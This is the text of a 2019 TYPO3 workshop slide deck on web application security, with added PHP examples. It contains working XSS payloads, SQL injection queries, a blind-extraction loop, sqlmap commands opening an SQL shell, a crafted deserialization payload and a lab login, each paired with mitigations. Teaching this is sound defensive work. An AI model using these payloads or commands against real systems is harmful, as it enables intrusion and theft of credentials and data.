Web Application
Security Workshop
Oliver Hader
oliver@typo3.org
@ohader
TYPO3 Developer Days 2019
August 4th, 2019
TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 2
▪Research & Development
▪Security Team Lead
▪50% TYPO3 GmbH
▪50% freelance software engineer
▪#hof #cycling #paramedic #in.die.musik
~# whoami
Oliver Hader
@ohader
▪ session probably recorded
▪ real attack vectors are shown
▪ hackers probably knew already
▪ official security fixes available
▪ report to security@typo3.org
Disclaimer
Agenda
▪ Attack technique basics (XSS, SQLi, deserialization)
▪ Attack tools/simulation (SQLmap, BeEF, BoNeSi)
▪ Phar Stream Vulnerability & Wrapper
▪ CVSSv3 vulnerability scoring
▪ TYPO3 Security Team
▪ Capture the Flag
Agenda
⏳
What is your agenda?
Do you have questions?
TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
Web Application Security Basics
Web Application Security
▪ CIA/compliance triad
▪ confidentiality
▪ private, personal, sensitive information
▪ integrity
▪ manipulation of information (“fake news”)
▪ availability
▪ denial of service
▪ online bank account
▪ blocking information flow
https://www.ibm.com/blogs/cloud-computing/2018/01/16/drive-compliance-cloud/
Hacking Playground
CONFIDENTIALITY - unauthorised access to information
Hacking Playground
INTEGRITY - e.g. manipulated information
Hacking Playground
AVAILABILITY - information/service not available
Web Application Security
Open Web Application Security Project - TOP 10 vulnerabilities
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
(chart: TYPO3 vulnerabilities in the past 5 years, grouped by TYPO3 core, TYPO3 3rd-party extensions and the PHP world)
Web Application Security
attack chains - multiple components might be affected
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
Hacking Playground: https://github.com/ohader/typo3v9-hack/
Techniques, Mitigation, Tools
Cross-Site Scripting
Cross-Site Scripting - basics
“classic” XSS
Cross-Site Scripting - basics
XSS vectors - more at https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Cross-Site Scripting - basics
“classic” XSS mitigation
✔
Cross-Site Scripting - basics
XSS with Fluid - f:format.html relies on TypoScript being available
Cross-Site Scripting - basics
ViewHelper output without any escaping == potentially vulnerable to XSS (Fluid escapes by default; every ViewHelper or template that disables escaping, e.g. via f:format.raw or escapeOutput = false, takes over that responsibility)
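The "classic" XSS and its mitigation, as an added example that is not part of the slides: the same user-controlled value rendered in HTML body, HTML attribute and inline-JavaScript context, once unescaped and once with context-appropriate encoding. The payloads are constructed; $term stands for something like $_GET['search'].

```php
<?php
declare(strict_types=1);

// Added example: context-aware output encoding versus raw interpolation.
// Requires PHP 7.3+ for JSON_THROW_ON_ERROR.

/** VULNERABLE: the "classic" XSS, user input concatenated into markup. */
function renderUnescaped(string $term): string
{
    return '<p>Results for: ' . $term . '</p>'
        . '<input name="search" value="' . $term . '">';
}

/** Encoding for HTML body text and quoted attribute values. */
function escapeHtml(string $value): string
{
    // ENT_QUOTES encodes both ' and " so the value cannot leave an attribute;
    // ENT_SUBSTITUTE avoids an empty result on invalid UTF-8 (a silent failure).
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Mitigated: every interpolation goes through the HTML encoder. */
function renderEscaped(string $term): string
{
    return '<p>Results for: ' . escapeHtml($term) . '</p>'
        . '<input name="search" value="' . escapeHtml($term) . '">';
}

/** Inline JavaScript is a different context: JSON-encode with the HTML-safe flags, do not HTML-escape. */
function renderJsConfig(string $term): string
{
    $json = json_encode(
        $term,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
    return '<script>var searchTerm = ' . $json . ';</script>';
}

// Constructed payloads: body-context script injection and attribute break-out.
$payloads = [
    '<script>alert(document.cookie)</script>',
    '" autofocus onfocus="alert(1)',
];
foreach ($payloads as $payload) {
    echo "unescaped: ", renderUnescaped($payload), "\n";
    echo "escaped:   ", renderEscaped($payload), "\n";
    echo "js:        ", renderJsConfig($payload), "\n\n";
}
```

The second payload never contains `<` or `>`, which is why a filter that only strips tags does not help: it is the attribute delimiter `"` that has to be encoded, and `ENT_QUOTES` is what makes `htmlspecialchars()` do that.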
http://typo3v9-hack.ddev.site:3000/ui/panel // admin & joh316
XSS exploitation
Browser Exploitation Framework in action
SQL injection
SQL injection basics
“classic” SQL injection - query
SQL injection basics
▪ SELECT … WHERE uid=10 AND pid>0;
▪ SELECT … WHERE uid=10 AND 1=1 -- AND pid>0; // boolean-based: condition true, row is returned
▪ SELECT … WHERE uid=10 AND 1=0 -- AND pid>0; // boolean-based: condition false, no row
▪ SELECT … WHERE uid=10 AND SLEEP(10) -- AND pid>0; // time-based: the answer is the response delay
▪ comment literals (MySQL) - everything after them, including the original rest of the WHERE clause, is ignored
▪ -- (MySQL requires a space or control character after the two dashes)
▪ #
▪ /* data */
SQL injection basics
▪ SELECT … WHERE uid=10 AND pid>0;
▪ SELECT uid,pid,header FROM … WHERE uid=10 UNION SELECT username,password,3 FROM be_users WHERE SUBSTR(username, 1, 1) = 'a' LIMIT 1,1 -- AND pid>0;
▪ … FROM be_users WHERE SUBSTR(username, 2, 1) = 'd' …
▪ … FROM be_users WHERE SUBSTR(username, 3, 1) = 'm' …
▪ … FROM be_users WHERE SUBSTR(username, 4, 1) = 'i' …
▪ … FROM be_users WHERE SUBSTR(username, 5, 1) = 'n' …
▪ one character per request: the extra row only shows up when the guess is right
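The character-by-character extraction sketched above, as an added example (not code from the slides or from TYPO3), run against a constructed in-memory SQLite database so it works offline. It uses the boolean-based form (a subquery in the WHERE clause) rather than the UNION form, because the oracle only needs a yes/no answer; the table and column names follow the slides, and the endpoint functions stand in for a vulnerable and a fixed eID script.

```php
<?php
declare(strict_types=1);

// Added example: blind SQL injection against a vulnerable query, and the
// same extraction failing against the prepared-statement version.
// Sample data is constructed.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE tt_content (uid INTEGER, pid INTEGER, header TEXT)');
$pdo->exec('CREATE TABLE be_users (username TEXT, password TEXT)');
$pdo->exec("INSERT INTO tt_content VALUES (10, 1, 'Welcome')");
$pdo->exec("INSERT INTO be_users VALUES ('admin', 'constructed-hash')");

/** VULNERABLE: the request value is concatenated into the statement. */
function fetchHeaderVulnerable(PDO $pdo, string $uid): ?string
{
    $sql = "SELECT uid, pid, header FROM tt_content WHERE uid=$uid AND pid>0";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return is_array($row) ? $row['header'] : null;
}

/** FIXED: validate the shape, then bind a typed parameter; the SQL text never changes. */
function fetchHeaderPrepared(PDO $pdo, string $uid): ?string
{
    if (!ctype_digit($uid)) {
        return null; // anything but a plain unsigned integer is rejected
    }
    $stmt = $pdo->prepare('SELECT uid, pid, header FROM tt_content WHERE uid=:uid AND pid>0');
    $stmt->bindValue(':uid', (int)$uid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return is_array($row) ? $row['header'] : null;
}

/**
 * Boolean-based blind extraction: each request asks "is character N of the
 * first username equal to X?" and reads the answer from whether the page
 * still shows a result. $oracle is the endpoint under attack.
 */
function extractUsernameBlind(callable $oracle, int $maxLength = 32): string
{
    $alphabet = str_split('abcdefghijklmnopqrstuvwxyz0123456789_.-');
    $found = '';
    for ($pos = 1; $pos <= $maxLength; $pos++) {
        $hit = false;
        foreach ($alphabet as $ch) {
            // trailing "-- " comments out the original "AND pid>0"
            $payload = "10 AND (SELECT SUBSTR(username, $pos, 1) FROM be_users LIMIT 1) = '$ch' -- ";
            if ($oracle($payload) !== null) {
                $found .= $ch;
                $hit = true;
                break;
            }
        }
        if (!$hit) {
            break; // no candidate matched: end of the string
        }
    }
    return $found;
}

$vulnerable = function (string $uid) use ($pdo): ?string { return fetchHeaderVulnerable($pdo, $uid); };
echo "vulnerable endpoint leaks: '", extractUsernameBlind($vulnerable), "'\n";

$prepared = function (string $uid) use ($pdo): ?string { return fetchHeaderPrepared($pdo, $uid); };
echo "prepared endpoint leaks:   '", extractUsernameBlind($prepared), "'\n";
```

Against the vulnerable function the loop needs at most 39 requests per character and recovers `admin`; against the prepared version every probe is rejected before it reaches the database and the result is empty. This is exactly the loop sqlmap automates, which is why the access log in the next slides fills up with hundreds of near-identical requests.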
SQL injection QueryBuilder WHERE
SELECT `uid`, `header` FROM `tt_content` WHERE `uid` = TEST; // the request value lands in the statement verbatim
SQL injection QueryBuilder WHERE
SELECT `uid`, `header` FROM `tt_content` WHERE `uid` = 0; // integer cast: non-numeric input silently becomes 0
SQL injection QueryBuilder WHERE
(prepared statement)
SELECT `uid`, `header` FROM `tt_content` WHERE `uid` = :dcValue1;
✔
SQL injection QueryBuilder WHERE
… WHERE `header` LIKE '%a%_%b%'; // `%` and `_` coming from user input still act as LIKE wildcards
SQL injection QueryBuilder WHERE
… WHERE `header` LIKE '%a%_%b%';
✔
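The WHERE variants from the last five slides, as an added example (not the slides' code and not TYPO3's): verbatim interpolation, integer cast, bound parameter, and the LIKE wildcard pitfall, reproduced with plain PDO on an in-memory SQLite database so it runs without TYPO3. The TYPO3 QueryBuilder counterparts are createNamedParameter() for binding and escapeLikeWildcards() for the pattern; my reading of the ✔ slide is that it does both. Sample rows are constructed.

```php
<?php
declare(strict_types=1);

// Added example: how the same WHERE clause is built unsafely, half-safely
// and safely, plus why binding alone is not enough for LIKE.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE tt_content (uid INTEGER, header TEXT)');
$pdo->exec("INSERT INTO tt_content VALUES (1, 'a_b'), (2, 'axb'), (3, 'a%b'), (4, 'plain')");

/** 1) Verbatim interpolation: `uid` = TEST is a syntax error at best, an injection at worst. */
function whereRaw(string $uid): string
{
    return "SELECT uid, header FROM tt_content WHERE uid = $uid";
}

/** 2) Integer cast: injection-proof, but 'TEST' silently becomes 0 (see the `uid` = 0 slide). */
function whereCast(PDO $pdo, string $uid): array
{
    $uid = (int)$uid;
    return $pdo->query("SELECT uid, header FROM tt_content WHERE uid = $uid")->fetchAll(PDO::FETCH_ASSOC);
}

/** 3) Bound parameter (TYPO3: createNamedParameter()): SQL text is constant, the value travels separately. */
function whereBound(PDO $pdo, string $uid): array
{
    $stmt = $pdo->prepare('SELECT uid, header FROM tt_content WHERE uid = :uid');
    $stmt->bindValue(':uid', $uid, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** LIKE with binding only: no injection, but "%" and "_" in the term remain wildcards. */
function likeBoundOnly(PDO $pdo, string $term): array
{
    $stmt = $pdo->prepare('SELECT uid, header FROM tt_content WHERE header LIKE :pattern');
    $stmt->execute([':pattern' => '%' . $term . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Counterpart of TYPO3's QueryBuilder::escapeLikeWildcards(); this version also escapes the backslash itself. */
function escapeLikeWildcards(string $value): string
{
    return addcslashes($value, '\\%_');
}

/** LIKE done right: escape the metacharacters, bind the pattern, declare the escape character. */
function likeEscaped(PDO $pdo, string $term): array
{
    $stmt = $pdo->prepare("SELECT uid, header FROM tt_content WHERE header LIKE :pattern ESCAPE '\\'");
    $stmt->execute([':pattern' => '%' . escapeLikeWildcards($term) . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

echo whereRaw('TEST'), "\n";               // ... WHERE uid = TEST
print_r(whereCast($pdo, 'TEST'));          // empty: uid = 0 matches nothing
print_r(whereBound($pdo, '1 OR 1=1'));     // empty: the whole string is one value, no row has that uid
print_r(likeBoundOnly($pdo, 'a_b'));       // uid 1, 2 and 3: "_" matched any single character
print_r(likeEscaped($pdo, 'a_b'));         // uid 1 only
```

MySQL treats the backslash as the default LIKE escape character, so the `ESCAPE` clause is mainly there for portability; the escaping of the term is what matters. The wildcard issue is not an injection, but `%%%%%%` patterns from search forms are a cheap way to make a large table scan on every request, and `_` lets a caller match records they should not find.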
SQLmap
http://typo3v9-hack.ddev.site/?eID=comments&search=term
▪ ddev ssh -s sqlmap
▪ bash # suggested
▪ git checkout master
▪ git pull
▪ ./sqlmap -u '<uri>' --risk 3 --level 3 --banner
▪ regular call
▪ ./sqlmap -u 'http://typo3v9-hack.ddev.site/?eID=comments&search=typo3*' --risk 3 --level 3 --banner
▪ inside ddev container
▪ ./sqlmap -u 'http://web/?eID=comments&search=typo3*' --risk 3 --level 3 --sql-shell # marker * in GET parameters
▪ ./sqlmap -u 'http://web/?eID=comments' --data '&search=typo3*' --risk 3 --level 3 --sql-shell # marker * in POST data
▪ the trailing * marks the injection point, so sqlmap does not have to guess the parameter
▪ --risk 3 enables OR-based payloads that can modify data when injected into UPDATE/DELETE statements, --level 3 adds headers (User-Agent, Referer) as injection points: lab targets only
SQLmap
meanwhile in /var/log/nginx/access.log
possible SQL injection attack payload
remote SQL shell via SQL injection
“stacked queries” (SELECT …; INSERT …;) are usually not available from PHP: mysqli::query() refuses more than one statement (only multi_query() accepts them), and PDO_MYSQL executes several statements per call only with prepare emulation enabled (its default) and PDO::MYSQL_ATTR_MULTI_STATEMENTS not set to false. Do not rely on that: UNION, boolean and time-based techniques work without stacking, as the SQL shell above shows.
Insecure Deserialization
Insecure Deserialization - Basics
__wakeup() runs during unserialize() and __destruct() when the resulting object is released (refcount drops to zero or the request ends), in both cases with property values taken from the serialized data; if any loaded class does something interesting with those properties (writes files, runs callbacks), the payload controls it
Insecure Deserialization - Basics
user submitted payload to be deserialized
allowed_classes introduced with PHP 7.0 (Polyfill available)
Insecure Deserialization - TYPO3-CORE-SA-2019-020
▪ https://typo3.org/security/advisory/typo3-core-sa-2019-020/
▪ https://blog.ripstech.com/2019/typo3-overriding-the-database/
▪ overrideVals[<table>][l10n_diffsource]=<serialized payload>
▪ addressed on June 25th, 2019
Insecure Deserialization - Basics
__destruct() saves content to filesystem
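The mechanism behind the last few slides, as an added example (not from the slides, not a TYPO3 class): a class whose __destruct() writes to the filesystem, a hand-built serialized payload pointing it at a path of the attacker's choosing, and the difference unserialize()'s allowed_classes option makes. The class name and the temp-file path are constructed for the demo.

```php
<?php
declare(strict_types=1);

// Added example: __destruct() as a deserialization sink, with and without
// allowed_classes. Works on PHP 7.0+ (allowed_classes was introduced there).

final class CacheWriter
{
    /** @var string */
    public $path = '';
    /** @var string */
    public $content = '';

    public function __destruct()
    {
        // Legitimate purpose: flush a cache entry when the object goes away.
        // With attacker-controlled properties it is an arbitrary file write.
        if ($this->path !== '') {
            file_put_contents($this->path, $this->content);
        }
    }
}

/** What an attacker would submit: the serialized form of a CacheWriter, built by hand. */
function buildPayload(string $path, string $content): string
{
    return sprintf(
        'O:11:"CacheWriter":2:{s:4:"path";s:%d:"%s";s:7:"content";s:%d:"%s";}',
        strlen($path), $path, strlen($content), $content
    );
}

/** VULNERABLE: any loaded class may be instantiated, its __wakeup()/__destruct() run. */
function unserializeVulnerable(string $payload)
{
    return unserialize($payload);
}

/** Hardened: objects become __PHP_Incomplete_Class, whose destructor does nothing. */
function unserializeHardened(string $payload)
{
    // Use ['allowed_classes' => [SomeValueObject::class]] if specific classes are genuinely needed.
    return unserialize($payload, ['allowed_classes' => false]);
}

$target  = sys_get_temp_dir() . '/deser-demo-' . getmypid() . '.txt';
$payload = buildPayload($target, "written by __destruct()\n");
echo $payload, "\n";

$obj = unserializeHardened($payload);
echo get_class($obj), "\n";                     // __PHP_Incomplete_Class
unset($obj);
var_dump(file_exists($target));                 // bool(false)

$obj = unserializeVulnerable($payload);
echo get_class($obj), "\n";                     // CacheWriter
unset($obj);                                    // refcount hits zero: __destruct() runs, file is written
var_dump(file_exists($target));                 // bool(true)
unlink($target);
```

The payload never calls anything itself; it only chooses a class and fills its properties. That is why the fix is not "validate the payload" but "never let user data pick a class": allowed_classes => false, or a format such as JSON that cannot express objects at all.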
Remote Code Execution #1
making use of FileCookieJar as attack container
Remote Code Execution #1
prepare attack against TYPO3 backend
Remote Code Execution #1
actual attack payload that shall be executed
Remote Code Execution #1
XSRF token needs to be known (valid backend user required)
Remote Code Execution #1
output of injected & executed /typo3/hack.php
Remote Code Execution #1
… new admin user h4ck3r31 …
Other™
Other™ random topics
▪ File Upload
▪ check/deny extensions (file deny pattern)
▪ check mime-types - image/png, text/html, …
▪ Extbase controller actions
▪ user/group access needs individual handling
▪ classic: logged in user can access profile data of others
▪ Directory Traversal
▪ zip bundle.zip ../malicious.php // an archive entry named ../malicious.php
▪ depends on how it is extracted - whether entry names are checked before they are used as paths
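The three checks from the list above in code, as an added example that is not from the slides and not TYPO3's upload handling: a deny pattern for dangerous file names, a content-based MIME check, and an archive extraction that vets entry names against traversal. The deny pattern is modelled on TYPO3's default file deny pattern as I know it from v9 (assumption: compare it with the value in your installation); the file names are constructed.

```php
<?php
declare(strict_types=1);

// Added example: upload hardening checks. Requires ext/fileinfo and ext/zip.

// Assumption: mirrors TYPO3's FILE_DENY_PATTERN_DEFAULT (v9). The "(\..*)?$" tail
// catches double extensions such as shell.php.png as well.
const FILE_DENY_PATTERN = '/\\.(php[3-8]?|phpsh|phtml|pht|phar|shtml|cgi)(\\..*)?$|\\.pl$|^\\.htaccess$/i';

// Allow-list: the only extensions this handler accepts, with the content type each must have.
const ALLOWED_MIME_BY_EXTENSION = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'pdf'  => 'application/pdf',
];

function isDeniedFileName(string $fileName): bool
{
    return preg_match(FILE_DENY_PATTERN, $fileName) === 1;
}

/** Does the file's actual content match what its extension promises? (finfo looks at the bytes, not the name.) */
function hasExpectedMimeType(string $fileName, string $tmpPath): bool
{
    $ext = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_MIME_BY_EXTENSION[$ext])) {
        return false; // not on the allow-list at all
    }
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    return $detected === ALLOWED_MIME_BY_EXTENSION[$ext];
}

/** Reject archive entries that would escape the extraction directory or carry a denied name. */
function isSafeArchiveEntry(string $entryName): bool
{
    if ($entryName === '' || strpos($entryName, "\0") !== false) {
        return false;
    }
    if ($entryName[0] === '/' || preg_match('#^[a-zA-Z]:#', $entryName) === 1) {
        return false; // absolute path
    }
    foreach (explode('/', str_replace('\\', '/', $entryName)) as $segment) {
        if ($segment === '..') {
            return false; // traversal
        }
    }
    return !isDeniedFileName(basename($entryName));
}

/** Extract only vetted entries instead of calling ZipArchive::extractTo() on the whole archive. */
function extractSafely(string $zipPath, string $targetDir): array
{
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        throw new RuntimeException("cannot open $zipPath");
    }
    $extracted = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->getNameIndex($i);
        if (!isSafeArchiveEntry($name)) {
            continue; // a real handler would log the rejected entry
        }
        $zip->extractTo($targetDir, $name);
        $extracted[] = $name;
    }
    $zip->close();
    return $extracted;
}

foreach (['logo.png', 'shell.php', 'shell.php.png', 'shell.phtml', '.htaccess', 'report.pdf'] as $name) {
    printf("%-15s denied: %s\n", $name, isDeniedFileName($name) ? 'yes' : 'no');
}
foreach (['images/a.png', '../malicious.php', '/etc/passwd', 'ok/../../x.txt'] as $entry) {
    printf("%-18s safe entry: %s\n", $entry, isSafeArchiveEntry($entry) ? 'yes' : 'no');
}
var_dump(hasExpectedMimeType('x.png', __FILE__)); // bool(false): this PHP file is not a PNG
```

The deny pattern and the MIME check are complementary: the pattern stops the web server from ever executing the upload, the MIME check stops an attacker from storing HTML or a polyglot under an image name (the hybrid PNG/Phar shown later in this deck is exactly such a file, and a MIME check does not catch it, which is why the phar:// section needs its own defence).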
phar://…
https://packagist.org/packages/typo3/phar-stream-wrapper
▪ usually used like
require_once('phar://bundle.phar/vendor/autoload.php');
$service = new BundleService();
▪ Phar archives carry meta-data that PHP unserializes as soon as the archive is opened through the stream wrapper - an insecure deserialization sink
▪ all Phar archives in every PHP version since 5.3 (PHP 8.0 later stopped unserializing the meta-data implicitly; check your PHP version)
▪ a “phar://” path is required to trigger it
▪ however, it is not limited to include/require: regular file functions go through the stream wrapper as well
▪ is_file(), file_exists(), fopen(), file_get_contents(), …
▪ is_file($_GET['fileName']) // … user submitted data
demo web application
file does exist - correct
result of implicit insecure deserialization
Hybrid - Valid PNG file & Valid Phar archive
building hybrid Phar archive
PharStreamWrapper in TYPO3 core
▪ \TYPO3\CMS\Core\IO\PharStreamWrapperInterceptor
▪ TYPO3 core - Phar only in typo3conf/ext/ directories
▪ \TYPO3\PharStreamWrapper\…\PharExtensionInterceptor
▪ Phar only with file extension “.phar”
▪ \TYPO3\PharStreamWrapper\…\PharMetaDataInterceptor
▪ Phar only without serialized objects in meta-data
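The two sides of the phar:// problem, as an added example that is not from the slides: the vulnerable is_file()-on-user-input pattern with a scheme check in front of it, and the registration of typo3/phar-stream-wrapper with the two package interceptors named above. The registration calls follow the package README as I remember it (Manager::initialize(), Behavior::withAssertion(), ConjunctionInterceptor to combine assertions); treat them as an assumption and verify against the version you install. isPlainLocalPath() and fileExistsHardened() are my own helpers.

```php
<?php
declare(strict_types=1);

// Added example: input-side check plus defence in depth via the stream wrapper.
// Assumes `composer require typo3/phar-stream-wrapper` and a Composer autoloader.
require_once __DIR__ . '/vendor/autoload.php';

use TYPO3\PharStreamWrapper\Behavior;
use TYPO3\PharStreamWrapper\Manager;
use TYPO3\PharStreamWrapper\PharStreamWrapper;
use TYPO3\PharStreamWrapper\Interceptor\ConjunctionInterceptor;
use TYPO3\PharStreamWrapper\Interceptor\PharExtensionInterceptor;
use TYPO3\PharStreamWrapper\Interceptor\PharMetaDataInterceptor;

/** Reject anything carrying a stream-wrapper scheme (phar://, data://, ...) or a NUL byte. */
function isPlainLocalPath(string $path): bool
{
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path) === 1) {
        return false;
    }
    return strpos($path, "\0") === false;
}

/** VULNERABLE: file_exists('phar://upload.png/x') opens the archive and unserializes its meta-data (PHP 5.3 - 7.x). */
function fileExistsVulnerable(string $userPath): bool
{
    return file_exists($userPath);
}

/** Hardened: no scheme, and the resolved path must stay inside $baseDir. */
function fileExistsHardened(string $userPath, string $baseDir): bool
{
    if (!isPlainLocalPath($userPath)) {
        return false;
    }
    $real = realpath($baseDir . '/' . $userPath);
    $base = realpath($baseDir);
    return $real !== false && $base !== false
        && strpos($real, $base . DIRECTORY_SEPARATOR) === 0;
}

// Defence in depth: route every phar:// access through the wrapper, which
// refuses archives that are not *.phar or whose meta-data contains objects.
Manager::initialize(
    (new Behavior())->withAssertion(new ConjunctionInterceptor([
        new PharExtensionInterceptor(),
        new PharMetaDataInterceptor(),
    ]))
);
if (in_array('phar', stream_get_wrappers(), true)) {
    stream_wrapper_unregister('phar');
}
stream_wrapper_register('phar', PharStreamWrapper::class);

var_dump(isPlainLocalPath('phar://uploads/image.png/test.txt'));       // bool(false)
var_dump(isPlainLocalPath('uploads/image.png'));                       // bool(true)
var_dump(fileExistsHardened('../../etc/passwd', __DIR__ . '/uploads')); // bool(false)
```

The scheme check is cheap and catches the obvious case, but it lives in one call site; the wrapper protects every is_file(), file_get_contents() and friends in the whole process, including third-party code you do not control, which is why TYPO3 core registers it globally.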
Vulnerability Reporting
CVSSv3, Mitre & Co.
How to report?
How to report a security vulnerability?
▪ always report via mail to security@typo3.org (Security Team)
▪ don’t post potential attacks to Forge, Twitter, … (public media)
▪ inform security team in case vulnerabilities are leaked
▪ please be patient & wait for feedback
▪ approx first response time is ~8 hours
Responsible Disclosure Workflow
▪ report vulnerability to vendor (here: security team)
▪ wait for feedback, questions or confirmation of this issue
▪ ask for status updates in case there is no activity
▪ declare deadline for full disclosure (e.g. 90 days)
▪ in case vendor does not take actions - public disclosure
▪ vendors (should) have interest to release security bulletins
▪ hiding a vulnerability only creates a false sense of security
Responsible Disclosure Workflow
https://blog.ripstech.com/2019/typo3-overriding-the-database/
How to read reports?
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
CVSSv3 example #1
▪ CVE-2013-1937
▪ phpMyAdmin Reflected Cross-site Scripting Vulnerability
▪ “Reflected cross-site scripting (XSS) vulnerabilities are present on
the tbl_gis_visualization.php page in phpMyAdmin 3.5.x, before
version 3.5.8. These allow remote attackers to inject arbitrary
JavaScript or HTML via the (1) visualizationSettings[width] or (2)
visualizationSettings[height] parameters.”
CVSSv3 example #1
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
CVSSv3 example #2
▪ CVE-2016-1645
▪ Google Chrome PDFium JPEG 2000 Remote Code Execution
Vulnerability
▪ “Allows remote attackers to execute arbitrary code on vulnerable
installations of Google Chrome. User interaction is required to
exploit this vulnerability in that the victim must visit a malicious
page or open a malicious file. Flaw exists within the handling of
JPEG 2000 images. Specially crafted JPEG 2000 image embedded
inside a PDF can force Google Chrome to write memory past the
end of an allocated object. Attacker can leverage this vulnerability
to execute arbitrary code under the context of the current process.”
CVSSv3 example #2
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
https://typo3.org/security/advisory/typo3-psa-2019-007/
https://nvd.nist.gov/vuln/detail/CVE-2019-11831
TYPO3 Security Team
▪ triage and answer reports
▪ communicate with reporters (individuals, pen-testers)
▪ forward information to maintainers (core, extension author, …)
▪ frankly remind people in case activity is low
▪ coordinate releases & release dates
▪ compile information into security bulletins / announcements
▪ educate & raise awareness in teams & community
Capture the Flag
https://www.root-me.org/en/Challenges/Web-Server/
https://ctf.hacker101.com/ctf
▪ https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Error # might work with SQLmap
▪ https://ctf.hacker101.com/ctf/launch/7 # check public API
References
▪ Running an SQL Injection Attack (“Computerphile”, nice series): https://www.youtube.com/watch?v=ciNHn38EyRc
▪ WordPress WPDB SQL Injection (nice, on “custom” escaping): https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
▪ CVSSv3 Examples: https://www.first.org/cvss/v3.0/examples
thx! ;-)
 
WebGL - 3D im Browser - Erfahrungsbericht mit BabylonJS
WebGL - 3D im Browser - Erfahrungsbericht mit BabylonJSWebGL - 3D im Browser - Erfahrungsbericht mit BabylonJS
WebGL - 3D im Browser - Erfahrungsbericht mit BabylonJSOliver Hader
 
Web application security
Web application securityWeb application security
Web application securityOliver Hader
 
Contribute to TYPO3 CMS
Contribute to TYPO3 CMSContribute to TYPO3 CMS
Contribute to TYPO3 CMSOliver Hader
 
T3CON13DE - TYPO3 CMS Team
T3CON13DE - TYPO3 CMS TeamT3CON13DE - TYPO3 CMS Team
T3CON13DE - TYPO3 CMS TeamOliver Hader
 
TYPO3camp Regensburg: TYPO3 6.0
TYPO3camp Regensburg: TYPO3 6.0TYPO3camp Regensburg: TYPO3 6.0
TYPO3camp Regensburg: TYPO3 6.0Oliver Hader
 
TYPO3 Inline Relational Record Editing (IRRE)
TYPO3 Inline Relational Record Editing (IRRE)TYPO3 Inline Relational Record Editing (IRRE)
TYPO3 Inline Relational Record Editing (IRRE)Oliver Hader
 
TYPO3 4.6 & TYPO3 4.7
TYPO3 4.6 & TYPO3 4.7TYPO3 4.6 & TYPO3 4.7
TYPO3 4.6 & TYPO3 4.7Oliver Hader
 

Más de Oliver Hader (15)

SAST für TYPO3 Extensions
SAST für TYPO3 ExtensionsSAST für TYPO3 Extensions
SAST für TYPO3 Extensions
 
TYPO3camp Munich 2018 - Keynote - "Wo woll'n mer denn hin?"
TYPO3camp Munich 2018 - Keynote - "Wo woll'n mer denn hin?"TYPO3camp Munich 2018 - Keynote - "Wo woll'n mer denn hin?"
TYPO3camp Munich 2018 - Keynote - "Wo woll'n mer denn hin?"
 
TYPO3 CMS - Datenmodifikation & Event Sourcing (Masterarbeit)
TYPO3 CMS - Datenmodifikation & Event Sourcing (Masterarbeit)TYPO3 CMS - Datenmodifikation & Event Sourcing (Masterarbeit)
TYPO3 CMS - Datenmodifikation & Event Sourcing (Masterarbeit)
 
TYPO3 Event Sourcing
TYPO3 Event SourcingTYPO3 Event Sourcing
TYPO3 Event Sourcing
 
H4CK1N6 - Web Application Security
H4CK1N6 - Web Application SecurityH4CK1N6 - Web Application Security
H4CK1N6 - Web Application Security
 
TYPO3 Backstage Development
TYPO3 Backstage DevelopmentTYPO3 Backstage Development
TYPO3 Backstage Development
 
Vor- und Nachteile von Web Components mit Polymer gegenüber AngularJS ohne P...
Vor- und Nachteile von Web Components mit Polymer gegenüber AngularJS ohne P...Vor- und Nachteile von Web Components mit Polymer gegenüber AngularJS ohne P...
Vor- und Nachteile von Web Components mit Polymer gegenüber AngularJS ohne P...
 
WebGL - 3D im Browser - Erfahrungsbericht mit BabylonJS
WebGL - 3D im Browser - Erfahrungsbericht mit BabylonJSWebGL - 3D im Browser - Erfahrungsbericht mit BabylonJS
WebGL - 3D im Browser - Erfahrungsbericht mit BabylonJS
 
Web Components
Web ComponentsWeb Components
Web Components
 
Web application security
Web application securityWeb application security
Web application security
 
Contribute to TYPO3 CMS
Contribute to TYPO3 CMSContribute to TYPO3 CMS
Contribute to TYPO3 CMS
 
T3CON13DE - TYPO3 CMS Team
T3CON13DE - TYPO3 CMS TeamT3CON13DE - TYPO3 CMS Team
T3CON13DE - TYPO3 CMS Team
 
TYPO3camp Regensburg: TYPO3 6.0
TYPO3camp Regensburg: TYPO3 6.0TYPO3camp Regensburg: TYPO3 6.0
TYPO3camp Regensburg: TYPO3 6.0
 
TYPO3 Inline Relational Record Editing (IRRE)
TYPO3 Inline Relational Record Editing (IRRE)TYPO3 Inline Relational Record Editing (IRRE)
